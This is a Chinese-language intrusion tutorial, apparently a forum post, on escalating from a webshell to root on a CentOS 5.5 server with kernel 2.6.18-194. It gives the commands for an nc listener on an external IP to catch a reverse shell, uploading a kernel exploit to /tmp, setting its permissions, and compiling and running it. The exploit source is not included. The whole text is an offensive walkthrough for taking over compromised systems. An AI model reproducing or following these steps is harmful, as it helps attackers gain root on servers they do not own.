很多时候拿到shell了,然后在菜道或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!
先看下linux内核
uanme -a

2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!
找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666

然后再点你shell

连接成功后

然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限是可写可执行!
然后我们进到/tmp目录
cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194

我这里有权限rwx,可读可写可执行.如果没有权限执行命令 chmod -R 777 文件名
我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译那么先执行 gcc /tmp/文件名.c -o /tmp/文件名
命令先把他编译好,在执行 ./2.6.18-194运行EXP就OK了!

|